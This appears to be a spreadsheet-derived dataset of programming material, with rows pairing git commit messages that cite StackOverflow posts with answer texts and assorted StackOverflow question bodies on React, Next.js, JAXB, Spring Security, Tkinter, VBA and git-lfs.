    ImPlot::EndPlot();
}
ax::NodeEditor::EndNode();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(Example, not my actual implementation.) Draws outside of the bounds of the node&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/UDZC3aoE.gif" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/UDZC3aoE.gif" alt="ImPlots not embedding into node" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As for my specific implementation: (I'm including this because I'm not sure if this matters or not)&lt;/p&gt;
&lt;p&gt;Editor.cpp (Excerpt from Draw loop)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Loop through all nodes in Nodes::nodes
    for (auto it = Nodes::nodes.begin(); it != Nodes::nodes.end(); ) {
        // Get node
        Nodes::BaseNode* node = it-&amp;gt;get();
        // Begin drawing  Node
        ax::NodeEditor::BeginNode(node-&amp;gt;GetNodeID()); // Begins Node, sets ID from node's GetNodeID (See BaseNode.h and BaseNode.cpp)
        node-&amp;gt;Draw();                          // Draws node (Defined for every class inheriting from BaseNode)
        if (!node-&amp;gt;IsOpen()) {                 // Checks if node should still be open (See BaseNode.h and BaseNode.cpp)
            it = Nodes::nodes.erase(it);       // If node should be closed, remove it from Nodes::nodes
        } else {
            ++it;                              // Else, keep chugging along
        }
        ax::NodeEditor::EndNode();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ScopeNode.cpp&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Oscil::Nodes::ScopeNode::Draw() {
    ImGui::Text(&amp;quot;Node A&amp;quot;);
    ax::NodeEditor::BeginPin(Nodes::GetConnectionID(GetNodeID(), 1), ax::NodeEditor::PinKind::Input);
    ImGui::Text(&amp;quot;-&amp;gt; In&amp;quot;);
    ax::NodeEditor::EndPin();
    if (ImPlot::BeginPlot(&amp;quot;OscilloscopePlot&amp;quot;)) {
        //ImPlot::PlotLine(&amp;quot;Line1&amp;quot;, {1, 2, 3, 4, 5, 6, 6});
        ImPlot::EndPlot();
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C522</t>
  </si>
  <si>
    <t>fix: resolve client component event handler issue
Added a form and assigned a submit event which led to an error:
"Error: Event handlers cannot be passed to Client Component props."
To resolve this, referenced the following solution from StackOverflow:
- Ensure `use client` is used for client-side interactivity as all components in Next 13 are server components by default.
Source: https://stackoverflow.com/questions/74471642/nextjs-13-button-onclick-event-handlers-cannot-be-passed-to-client-componen</t>
  </si>
  <si>
    <t>Add 'use client'; on top of the file where you are using handleClick because all components in Next 13 by default are server components, therefore for client side interactivity you need to use use client.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to hear other people's advice on when one should build a web application versus building a thick client.
Over the last few years, I have participated in several discussions about whether an application should be built (or an old application upgraded) with a web browser interface.  Usually these were internal systems used within an organization, not mass-market shrink-wrap products, and they were not actually on the public Internet.  I do not want to limit the discussion to these types of applications solely though.
There are obvious cases where an application should be one or the other (e.g. no web based video editing software).  On the other hand, Javascript libraries are making more rich experiences in the browser less difficult to implement everyday.  
Have Javascript libraries and advanced server side technologies made things such as right-click context menus, drag and drop, etc. doable on the client side without a large effort?  At what point does the extra complexity of writing for the web override the benefits such as ease of deployment and cross-platform compatibility, particularly if you are not trying to create the next Stack Overflow, but instead just building an internal application?
Does the fact that an internal application has a limited and captive audience more or less override any concerns over improved usability that a thick client can provide?
</t>
  </si>
  <si>
    <t>C523</t>
  </si>
  <si>
    <t>Fix component error
https://stackoverflow.com/questions/71791347/npm-package-cannot-be-used-as-a-jsx-component-type-errors</t>
  </si>
  <si>
    <t>Had the same issue. Just add this:
"resolutions": {
  "@types/react": "17.0.2",
  "@types/react-dom": "17.0.2"
},
to the
package.json
file and run
yarn
command.
UPD:
Just a bit detailed answer:
@types/react-dom
has its own dependencies and one of them is
@types/react
with a version set to
'*'
- a major release, that now, probably refers to
18
.
Even if you specify some strict versions in your
package.json
(without
^
), parent package might install its own duplicates of packages that you are already using for its own purpose.
By using
resolutions
, we are specifying strict restrictions for dependencies of dependencies.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$invoices = Vendor_invoice::where('vendor_id',$id)-&amp;gt;where('status','!=',&amp;quot;Paid&amp;quot;)-&amp;gt;orderBy('due_date', &amp;quot;ASC&amp;quot;)-&amp;gt;get();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It gets all invoices that are not paid in full for a specific vendor. It's possible that payments have been applied to an invoice so I need to query the Invoice_payments table to get the sum of all payments applied to an invoice and do so within the same query in order to populate a table and include the amount due and not simply the invoice total.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C524</t>
  </si>
  <si>
    <t>refactor: remove react fragments as they may be causing hydration errors
See https://stackoverflow.com/questions/72662294/can-i-pass-data-fetched-in-getstaticprops-to-a-component/72665172#72665172.</t>
  </si>
  <si>
    <t xml:space="preserve">The architecture of one of our products is a typical 3-tier solution:
C# client
WCF web service
SQL Server database
The client requests information from the web service. The web service hits the database for the information and returns it to the client.
Here's the problem.  Some of these queries can take a long, long time, and we don't know up-front which ones will be slow.  We know some that are often slower than others, but even the simplest requests can be slow given enough data.  Sometimes uses query or run reports on large amounts of data.  The queries can be optimized only so far before the sheer volume of data slows them down.
If a query in the database hits the maximum query timeout in SQL server, the database query terminates, and the web service returns an error to the client.  This is understood.  We can handle these errors.
The client is waiting for the web service call to complete.  If the database call takes a long time, the client may timeout on its call to the web service.  The client gives up, but the database request continues processing.  At this point, the client is out-of-synch with the database.  The database call may or may not succeed.  There may have been an error.  The client will never know.  In some cases, we don't want our users initiating another request that may result in an invalid state given the completion of the previous request.
I'm curious to see how others have handled this problem.  What strategies have you used to prevent web service timeouts from affecting database calls?
The best ideas I can come up with involve making an actual database layer somewhere-- inside the web service, attached to a message queue-- something.  Offloading every single query to another process seems excessive.  (Then again, we don't always know if a given request will be fast or slow.)
It would be great if we could separate the act of making an HTTP request from the act of initiating and running a database process.  I've seen this done with a custom server at a previous company, but it was using straight socket communication, and I'd rather avoid replacing the web service with some custom application.
Note that given the amount of data we deal with, we are all over query optimization.  Query optimization, indexes, etc., only takes you so far when the volume of data is high.  Sometimes things just take a long time.
</t>
  </si>
  <si>
    <t>C525</t>
  </si>
  <si>
    <t>Wrap initial setExternalState() call in useEffect
This eliminates a basic error in using functional components:
https://stackoverflow.com/a/65911215/1886928</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use Mapstruct to build out a large number of objects that will be converted. Due to the nature of the systems using the objects they are populated with default values and instead have a separate &amp;quot;is[fieldName]Set&amp;quot; field to determine if a value has actually been assigned to the field or not. For example:&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;public class exampleObject {
  private Integer id;
  private Boolean isIdSet;
  private String name;
  private Boolean isNameSet;
  private Float coolNumber;
  private Boolean isCoolNumberSet;
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;How would I change the base way that Mapstruct checks for value population from checking to make sure the value isn't null to checking to see if the isSet for the field is true or not?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C526</t>
  </si>
  <si>
    <t>Add Blade component renderer
Inspired by https://stackoverflow.com/a/69732872/4149783</t>
  </si>
  <si>
    <t xml:space="preserve">I've been thinking about how to implement the badge feature similar to SO's on a new website. What is the best way to store criteria for badges?
Two ideas:
All code
'Second system' - create a meta architecture for defining badges and their criteria. Store some info in the database and have code query it to figure out the badges and their criteria.
Are there better ways?
</t>
  </si>
  <si>
    <t>C527</t>
  </si>
  <si>
    <t>Fix JAXB concurrency problem
Create marshaller and unmarshaller on every request. Rationale: according to https://stackoverflow.com/questions/7400422/jaxb-creating-context-and-marshallers-cost:
"JAXBContext is thread safe and should only be created once and reused to avoid the cost of initializing the metadata multiple times.  Marshaller and Unmarshaller are not thread safe, but are lightweight to create and could be created per operation."
232-add-log-output-for-enabled-tls-protols-in-http-client</t>
  </si>
  <si>
    <t>Note: I'm the EclipseLink JAXB (MOXy) lead and a member of the JAXB 2 (JSR-222) expert group.
JAXBContext is thread safe and should only be created once and reused to avoid the cost of initializing the metadata multiple times. Marshaller and Unmarshaller are not thread safe, but are lightweight to create and could be created per operation.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to see the corners of the following chart rounded as if it were a &lt;code&gt;borderRadius&lt;/code&gt; style prop but cannot figure out what pathData element I am missing. It looks like &lt;code&gt;strokeLineJoin&lt;/code&gt; and &lt;code&gt;strokeLineCap&lt;/code&gt; does pretty much nothing and updating the pathData with more arc data doesn't seem to help. I'm not sure if it's the spacing I'm trying to create between the pie slices are a limiting factor for viewing the rounded corners however placing a ridiculously high value to round the corners doesn't seem to have an effect either. Here is the code and a screenshot of what it produces:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import React from 'react';
import { View } from 'react-native';
import Svg, { G, Path, Circle } from 'react-native-svg';
interface PieSlice {
  value: number;
  color: string;
}
interface CustomPieChartProps {
  data: PieSlice[];
  size: number;
}
const CustomPieChart: React.FC&amp;lt;CustomPieChartProps&amp;gt; = ({ data, size }) =&amp;gt; {
  const total = data.reduce((sum, slice) =&amp;gt; sum + slice.value, 0);
  let cumulativeValue = 0;
  const cornerRadius = size / 20; // Adjust this value for more or less curvature
  const slices = data.map((slice) =&amp;gt; {
    const startAngle = (cumulativeValue / total) * 2 * Math.PI;
    cumulativeValue += slice.value;
    const endAngle = (cumulativeValue / total) * 2 * Math.PI;
    const largeArcFlag = endAngle - startAngle &amp;gt; Math.PI ? 1 : 0;
    // Calculate points with corner radius
    const x1 = size / 2 + (size / 2) * Math.cos(startAngle);
    const y1 = size / 2 + (size / 2) * Math.sin(startAngle);
    const x2 = size / 2 + (size / 2) * Math.cos(endAngle);
    const y2 = size / 2 + (size / 2) * Math.sin(endAngle);
    const pathData = `
      M${size / 2},${size / 2}
      L${x1},${y1}
      A${size / 2},${size / 2} 0 ${largeArcFlag} 1 ${x2},${y2}
      L${size / 2},${size / 2}
      Z
    `;
    return (
      &amp;lt;Path
        key={`${slice.color}-${slice.value}`}
        d={pathData}
        fill={slice.color}
        stroke=&amp;quot;white&amp;quot;
        strokeWidth={cornerRadius}
        strokeLinejoin=&amp;quot;round&amp;quot;
        strokeLinecap=&amp;quot;round&amp;quot;
      /&amp;gt;
    );
  });
  return (
    &amp;lt;View style={{ justifyContent: 'center', alignItems: 'center' }}&amp;gt;
      &amp;lt;Svg width={size} height={size}&amp;gt;
        &amp;lt;G&amp;gt;
          {slices}
          &amp;lt;Circle cx={size / 2} cy={size / 2} r={size / 4} fill=&amp;quot;white&amp;quot; /&amp;gt;
        &amp;lt;/G&amp;gt;
      &amp;lt;/Svg&amp;gt;
    &amp;lt;/View&amp;gt;
  );
};
export default CustomPieChart;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/26xDe8wM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/26xDe8wM.png" alt="pie chart" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C528</t>
  </si>
  <si>
    <t>Fix component virtual functions
https://stackoverflow.com/questions/3065154/undefined-reference-to-vtable</t>
  </si>
  <si>
    <t>So, I've figured out the issue and it was a combination of bad logic and not being totally familiar with the automake/autotools world. I was adding the correct files to my Makefile.am template, but I wasn't sure which step in our build process actually created the makefile itself. So, I was compiling with an old makefile that had no idea about my new files whatsoever.
Thanks for the responses and the link to the GCC FAQ. I will be sure to read that to avoid this problem occurring for a real reason.</t>
  </si>
  <si>
    <t xml:space="preserve">As far as I can see Solutions Architect is just a different "marketing" term for Applications Architect. Is that correct or are the roles actually different somehow? If so, how?
And yes, I have searched for this both on StackOverflow and on Google.
</t>
  </si>
  <si>
    <t>C529</t>
  </si>
  <si>
    <t>Modify background image, drawer hover, set path
Export all components under a single namespace
Refer to:
https://stackoverflow.com/questions/61390510/how-to-import-material-ui-components</t>
  </si>
  <si>
    <t>Yes, there is an import all in JavaScript. You can do it like so:
import * as Mui from '@material-ui/core';
This puts all of the named exports of
@material-ui/core
into the
Mui
"namespace". Then, you can easily access any of the components i.e.:
&lt;Mui.Typography&gt;Test&lt;/Mui.Typography&gt;
You can read more about
import
here
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up an end-to-end (E2E) workflow using &lt;strong&gt;Maestro&lt;/strong&gt; in an &lt;strong&gt;Expo EAS&lt;/strong&gt; environment. The following command works perfectly in my local development environment:&lt;/p&gt;
&lt;pre class="lang-bash prettyprint-override"&gt;&lt;code&gt;maestro test -e APP_ID=myappid
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And my &lt;code&gt;maestro.yml&lt;/code&gt; looks like this:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;appId: ${APP_ID}
---
- launchApp:
    clearState: true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when running this in the &lt;strong&gt;EAS&lt;/strong&gt; environment, it fails to find the &lt;code&gt;APP_ID&lt;/code&gt; and throws the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;maestro.cli.runner.TestSuiteInteractor.invoke: Launch app &amp;quot;${APP_ID}&amp;quot; with clear state FAILED
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems like &lt;strong&gt;Maestro is not able to resolve the environment variable (&lt;code&gt;APP_ID&lt;/code&gt;) inside the EAS environment&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;How can I correctly pass environment variables like &lt;code&gt;APP_ID&lt;/code&gt; to Maestro when running tests in an EAS build? Is there a specific way to ensure that Maestro picks up environment variables in an Expo EAS environment?&lt;/p&gt;
&lt;p&gt;Any insights would be greatly appreciated!&lt;/p&gt;
&lt;p&gt;Hardcoding the &lt;code&gt;appId&lt;/code&gt; directly in &lt;code&gt;maestro.yml&lt;/code&gt; (which works but is not a viable solution for different environments).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C53</t>
  </si>
  <si>
    <t>Fix bug with Spring Security and redirection to /favicon.ico after successful login
See http://stackoverflow.com/q/11242609</t>
  </si>
  <si>
    <t>You're best to omit that path from the filter chain completely.
Use
&lt;http pattern="/favicon.ico" security="none" /&gt;
&lt;http auto-config="true"&gt;
    &lt;intercept-url pattern="/**" access="ROLE_ADMIN"/&gt;
&lt;/http&gt;
instead.
Also remember that you need to order your
intercept-url
elements from most to least specific patterns, so your original configuration would have ignored the favicon pattern in any case.
I'd also recommend that you don't use
auto-config
but specify the features that you want to use explicitly so that you are clear what is being added to the security filter chain.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application with two Text widgets in two Frames. Clicking a link (formatted text with a tag bind) in one Text widget (&lt;code&gt;Results.text&lt;/code&gt;) should select text in another (&lt;code&gt;Editor.text&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;When I click once on the link, the &lt;code&gt;see&lt;/code&gt; part works but &lt;code&gt;mark_set&lt;/code&gt; and applying the selection do not.&lt;/p&gt;
&lt;p&gt;If I double click the link it works as intended, but I'd like it to work with a single click. I have tried returning &lt;code&gt;&amp;quot;break&amp;quot;&lt;/code&gt; from the event handler and using &lt;code&gt;focus_set&lt;/code&gt;, &lt;code&gt;focus_force&lt;/code&gt;, &lt;code&gt;update_idletasks&lt;/code&gt; and &lt;code&gt;update&lt;/code&gt; in the &lt;code&gt;goto&lt;/code&gt; method with no success.&lt;/p&gt;
&lt;p&gt;I'm using Python 3.13, Tcl/Tk 8.6.15 and Windows 10.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import math
import tkinter as tk
from tkinter.font import Font
from typing import Any, Callable
LIPSUM = &amp;quot;&amp;quot;&amp;quot;\
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque et lectus lacinia enim dictum posuere. Quisque nunc tellus, luctus quis eleifend a, placerat maximus ipsum. 
Nam egestas, nisi in varius tempus, enim tortor consectetur eros, ac pretium urna ipsum at orci. Praesent ut dui eu lectus efficitur ultrices. In vehicula leo faucibus tempor posuere. 
Nam et est in nisi iaculis rhoncus eu et nibh. Aliquam eget risus lacus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.&amp;quot;&amp;quot;&amp;quot;
class Editor(tk.Frame):
    def __init__(self, *args: Any, **kwargs: Any):
        tk.Frame.__init__(self, *args, **kwargs)
        self.grid_rowconfigure(1, weight=1)
        self.grid_columnconfigure(1, weight=1)
        self.line_num = tk.Text(
            self,
            width=3,
            yscrollcommand=self.scroll_update,
            cursor=&amp;quot;arrow&amp;quot;,
        )
        self.line_num.tag_configure(&amp;quot;rjust&amp;quot;, justify=&amp;quot;right&amp;quot;)
        self.line_num.insert(&amp;quot;1.0&amp;quot;, &amp;quot;1&amp;quot;, &amp;quot;rjust&amp;quot;)
        # disable selection
        self.line_num.bindtags((str(self.line_num), str(self), &amp;quot;all&amp;quot;))
        self.line_num.grid(row=1, column=0, sticky=&amp;quot;ns&amp;quot;)
        self.text = tk.Text(
            self,
            yscrollcommand=self.scroll_update,
            wrap=&amp;quot;none&amp;quot;,
        )
        self.text.bind(&amp;quot;&amp;lt;KeyRelease&amp;gt;&amp;quot;, lambda _: self.update_lines())
        self.text.grid(row=1, column=1, sticky=&amp;quot;nesw&amp;quot;)
        self.editor_v_sbr = tk.Scrollbar(self, command=self.editor_scroll)
        self.editor_v_sbr.grid(row=1, column=2, sticky=&amp;quot;ns&amp;quot;)
        self.editor_h_sbr = tk.Scrollbar(
            self, command=self.text.xview, orient=&amp;quot;horizontal&amp;quot;  # type:ignore
        )
        self.editor_h_sbr.grid(row=2, column=0, columnspan=2, sticky=&amp;quot;ew&amp;quot;)
        self.text.config(xscrollcommand=self.editor_h_sbr.set)
    def editor_scroll(self, _: Any, position: float):
        self.line_num.yview_moveto(position)
        self.text.yview_moveto(position)
    def scroll_update(self, first: float, last: float):
        self.text.yview_moveto(first)
        self.line_num.yview_moveto(first)
        self.editor_v_sbr.set(first, last)
    def update_lines(self, new_text: str | None = None):
        if not new_text:
            new_text = self.text.get(&amp;quot;1.0&amp;quot;, &amp;quot;end&amp;quot;)
        self.line_num.config(state=&amp;quot;normal&amp;quot;)
        self.line_num.delete(&amp;quot;1.0&amp;quot;, &amp;quot;end&amp;quot;)
        num_lines = len(new_text.splitlines(True))
        if num_lines &amp;gt;= 1000:
            new_width = int(math.log10(num_lines)) + 1
            self.line_num.config(width=new_width)
        self.line_num.insert(
            &amp;quot;1.0&amp;quot;,
            &amp;quot;\n&amp;quot;.join([str(x + 1) for x in range(num_lines)]),
            &amp;quot;rjust&amp;quot;,
        )
        self.line_num.config(state=&amp;quot;disabled&amp;quot;)
    def view_file(self):
        self.text_content = LIPSUM
        self.update_lines(self.text_content)
        self.text.delete(&amp;quot;1.0&amp;quot;, &amp;quot;end&amp;quot;)
        self.text.insert(&amp;quot;1.0&amp;quot;, self.text_content)
    def goto(self, start: tuple[int, int], end: tuple[int, int]):
        pos: Callable[[tuple[int, int]], str] = lambda x: f&amp;quot;{x[0]}.{x[1]-1}&amp;quot;
        self.text.focus_set()
        self.text.see(pos(start))
        self.text.mark_set(&amp;quot;insert&amp;quot;, pos(start))
        self.text.tag_remove(&amp;quot;sel&amp;quot;, &amp;quot;1.0&amp;quot;, &amp;quot;end&amp;quot;)
        self.text.tag_add(&amp;quot;sel&amp;quot;, pos(start), pos(end))
class Results(tk.LabelFrame):
    def __init__(
        self,
        master: tk.Tk,
        goto: Callable[[tuple[int, int], tuple[int, int]], None],
        *args: Any,
        **kwargs: Any,
    ):
        tk.LabelFrame.__init__(self, master, *args, text=&amp;quot;Results&amp;quot;, **kwargs)
        self.grid_columnconfigure(0, weight=1)
        self.grid_rowconfigure(0, weight=1)
        self.text = tk.Text(
            self,
            wrap=&amp;quot;none&amp;quot;,
        )
        self.text.insert(&amp;quot;end&amp;quot;, &amp;quot;Lorem ipsum dolor sit amet\n&amp;quot;)
        self.text.insert(&amp;quot;end&amp;quot;, &amp;quot;View in editor&amp;quot;, &amp;quot;link&amp;quot;)
        def callback():
            self.goto((1, 1), (1, 27))
            return &amp;quot;break&amp;quot;
        self.text.tag_bind(&amp;quot;link&amp;quot;, &amp;quot;&amp;lt;Button-1&amp;gt;&amp;quot;, lambda _: callback())
        self.link_font = Font(self, &amp;quot;TkDefaultFont&amp;quot;)
        self.link_font.configure(underline=True)
        self.text.tag_configure(&amp;quot;link&amp;quot;, font=self.link_font, foreground=&amp;quot;SlateBlue3&amp;quot;)
        self.text.configure(state=&amp;quot;disabled&amp;quot;)
        self.text.tag_bind(&amp;quot;link&amp;quot;, &amp;quot;&amp;lt;Enter&amp;gt;&amp;quot;, self.link_enter)
        self.text.tag_bind(&amp;quot;link&amp;quot;, &amp;quot;&amp;lt;Leave&amp;gt;&amp;quot;, self.link_leave)
        self.text.grid(row=0, column=0, sticky=&amp;quot;nesw&amp;quot;, padx=(10, 0), pady=(10, 0))
        self.y_sbr = tk.Scrollbar(self, command=self.text.yview)  # type:ignore
        self.y_sbr.grid(row=0, column=1, sticky=&amp;quot;ns&amp;quot;, padx=(0, 10), pady=(10, 0))
        self.x_sbr = tk.Scrollbar(
            self, command=self.text.xview, orient=&amp;quot;horizontal&amp;quot;  # type:ignore
        )
        self.x_sbr.grid(row=1, column=0, sticky=&amp;quot;ew&amp;quot;, pady=(0, 10), padx=(10, 0))
        self.text.configure(yscrollcommand=self.y_sbr.set)
        self.text.configure(xscrollcommand=self.x_sbr.set)
        self.goto = goto
    def link_enter(self, _: Any):
        self.text.config(cursor=&amp;quot;hand2&amp;quot;)
    def link_leave(self, _: Any):
        self.text.config(cursor=&amp;quot;&amp;quot;)
class App(tk.Tk):
    def __init__(self):
        tk.Tk.__init__(self)
        self.editor = Editor(self)
        self.editor.grid(row=0, column=1, sticky=&amp;quot;nesw&amp;quot;, padx=10, pady=10)
        self.results = Results(self, self.editor.goto)
        self.results.grid(row=0, column=2, sticky=&amp;quot;nesw&amp;quot;, padx=10, pady=10)
        self.editor.text.focus()
        self.editor.view_file()
if __name__ == &amp;quot;__main__&amp;quot;:
    app = App()
    app.mainloop()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C530</t>
  </si>
  <si>
    <t>https://stackoverflow.com/questions/56937379 pass a component to anot
her component</t>
  </si>
  <si>
    <t xml:space="preserve">I start build a system with distributed architecture by all applications will communication by REST service to expose some data(DTO) or invoke some updates. I would like to know how to use NHibernate to help with manage domain object because they are in different applications. How NHibernate identify which objects are new for inserting and old for updating? 
</t>
  </si>
  <si>
    <t>C531</t>
  </si>
  <si>
    <t>client: fix Player state set when component unmounts
reference: https://stackoverflow.com/questions/53949393/cant-perform-a-react-state-update-on-an-unmounted-component</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a P.O. system to track purchases.&lt;/p&gt;
&lt;p&gt;Users fill in information on the tab Open P.O. Form using the drop down options i have create.&lt;/p&gt;
&lt;p&gt;Once all boxes are complete the user will eventually hit a create button that will assign a unique PO #&lt;/p&gt;
&lt;p&gt;All the data will be saved on the Data Base Tab and a PDF File will be created and saved on my network drive.&lt;/p&gt;
&lt;p&gt;The name of the PDF file will be &amp;quot;Cont Vrac P.O. 420-10000x&amp;quot; where x=x+1. every PO that is created will increase the P.O.# by one. Exe the first PO Create will be 420-100001 the second PO will be 420-100002 etc...&lt;/p&gt;
&lt;p&gt;I cannot get the file to attach, to the email. I suppose because it does not know what file to pick up.&lt;/p&gt;
&lt;p&gt;All the other code works. The attach PDF is the last piece to this puzzle.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Sub Create_Save_And_Send_PDF()
Dim xOutlookObj As Object
Set xOutlookObj = CreateObject(&amp;quot;Outlook.Application&amp;quot;)
Dim xEmailObj As Object
Set xEmailObj = xOutlookObj.CreateItem(0)
'This makes &amp;quot;Open PO Form&amp;quot; as the active worksheet
Dim WS As Worksheet
Set WS = ThisWorkbook.Sheets(&amp;quot;Open P.O. Form&amp;quot;)
'This designates the range on Open PO Form that will be included in the PO PDF
Dim PDF_Range As Range
Set PDF_Range = WS.Range(&amp;quot;A1:F44&amp;quot;)
'This is designating the PO Number to be used in the saved file name and Email Subject
Dim PO_Number As Range
Set PO_Number = WS.Range(&amp;quot;B7&amp;quot;)
'This identifies the name of the PDF File
Dim PO_File As String
PO_File = &amp;quot;Cont Vrac P.O. &amp;quot; &amp;amp; PO_Number
'This Identifies the email adress in the Open P.O. Form
Dim Email As Range
Set Email = WS.Range(&amp;quot;B11&amp;quot;)
'This is the Scripy in the body of the Email
Dim BodyA As String
BodyA = &amp;quot;Hello&amp;quot; &amp;amp; vbNewLine &amp;amp; vbNewLine &amp;amp; &amp;quot;You Have Successfully Create a P.O.&amp;quot; &amp;amp; vbNewLine &amp;amp; vbNewLine &amp;amp; &amp;quot;A copy has been included as an attachement in this Email&amp;quot; &amp;amp; vbNewLine &amp;amp; vbNewLine &amp;amp; &amp;quot;Thank You&amp;quot;
'This Designates where the file will be saved &amp;quot;N:\CVR\La Prairie Shared\commun\Accounting\MONTH END\Mark Test P.O\&amp;quot; + &amp;quot;Cont Vrac P.O. &amp;quot; is the file path on the drive and  + &amp;quot;Cont Vrac P.O. &amp;quot; &amp;amp; PO_Number.Value
'is the name of the file. The saved file will be called &amp;quot;Cont Vrac P.O. &amp;amp; the PO Number
Dim PDF_Path As String
PDF_Path = &amp;quot;N:\CVR\La Prairie Shared\commun\Accounting\MONTH END\Mark Test P.O\&amp;quot; + &amp;quot;Cont Vrac P.O. &amp;quot; &amp;amp; PO_Number.Value + &amp;quot;.pdf&amp;quot;
'Dim PDF_Attach As Object
'Set PDF_Attach = &amp;quot;N:\CVR\La Prairie Shared\commun\Accounting\MONTH END\Mark Test P.O\&amp;quot; + &amp;quot;Cont Vrac P.O. &amp;quot; &amp;amp; PO_Number.Value
'align Range in PDF
    WS.PageSetup.CenterHorizontally = True
'This is optional can be activated by switching False to true. it will open the PDF once the command is sent
    PDF_Range.ExportAsFixedFormat Type:=xlTypePDF, _
    Filename:=PDF_Path, openAfterPublish:=False
'create email
    With xEmailObj
    .display
    .to = Email.Value
    .cc = &amp;quot;&amp;quot;
    .bcc = &amp;quot;&amp;quot;
    .Subject = &amp;quot;Cont Vrac P.O. &amp;quot; &amp;amp; PO_Number.Value
    .Body = BodyA
*.Attachements.Add 'THIS IS WHERE I CANNOT CONTINUE. I DO NOT KNOW WHAT TO INCLUDE HERE*
    xEmailObj.send
End With
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C532</t>
  </si>
  <si>
    <t>Update pgevent-component.adoc
Add a section for common problems, explaining a very undocumented issue when trying to use a DataSource to connect to a PostgreSQL database.
More on the issue: https://stackoverflow.com/questions/64445026</t>
  </si>
  <si>
    <t xml:space="preserve">I have a stream object, and I want to create and output xml using some kind of xml stream, based on data in my input stream.  I haven't done much work with streams, so I am trying to learn how to do this as efficiently as possible.  The idea is that I do not want to load the entire input stream in memory, then create the entire output stream in memory because at some point you end up with at least double the size of the input stream taking up memory.  
There must be ways so that as data is read in the input stream, the xml stream is built and the data read from the input stream is discarded.  Additionally, I would like to architect it so that the xml stream isn't built completely then passed out, but instead the xml stream can be read as it is being built.   Does anyone have some code samples, or good resources for learning about this?
</t>
  </si>
  <si>
    <t>C533</t>
  </si>
  <si>
    <t>Updates to dice roller
Minor style tweaks, logic written. Need to figure out how to get useState working for every instance of the dice roller. Suggested using a key attribute on each element in the parent wrapper
stackoverflow post: https://stackoverflow.com/questions/56579547/how-to-isolate-state-among-different-instances-of-functional-component-that-uses</t>
  </si>
  <si>
    <t>Inside the component you are doing correct. Init value taken from props - it's common practice.
But see, useState() applies init value only on initial render(componentDidMount or constructor for class-based components). The way you use that component you did not re-create &lt;Example but update that.
So in other words the same case you'd get having class-based component without componentDidUpdate: React updates existing &lt;Example&gt; instead of re-creating that and does not apply componentDidMount anymore(for your case it does not init useState with initial value).
I see different way to handle that.
Force React to re-create element instead of updating by using key. Hacky but working way:
switch (step) {
  case 0:
    return &lt;Example key="step-1" init={100} /&gt;
  case 1:
    return &lt;Example key="step-2" init={111} /&gt;
  case 2:
    return &lt;Example key="step-3" init={112} /&gt;
  default:
    return "Unknown step"
}
You may use useEffect as hook-version of componentDidUpdate:
useEffect(() =&gt; {
  setCount(init);
}, [init]);
Here is a tricky moment since you are counting clicks. So making just setCount(init) might be not good move and will break your calculation. So actual code may be much more complicated. I'm not sure here since don't understand the logic behind counting.
With lifting state up(push count to parent component) you will not need to update anything after init is updated.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;git version 2.39.5 (Apple Git-154) in /use/bin/git
git-lfs/3.6.1 (Github; darwin arm64; go 1.23.3; git ea47a34b) in /usr/local/bin/git-lfs&lt;/p&gt;
&lt;p&gt;I have set user.name, user.email and core.sshcommand=ssh -i ~/.ssh/id_rsa&lt;/p&gt;
&lt;p&gt;I'm getting the authentication message when I do ssh -T git@github.com&lt;/p&gt;
&lt;p&gt;My Global and Local git config:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filter.lfs.smudge=git-lfs smudge -- %f
filter.lfs.process=git-lfs filter-process
filter.lfs.required=true
user.name=&amp;lt;My name&amp;gt;
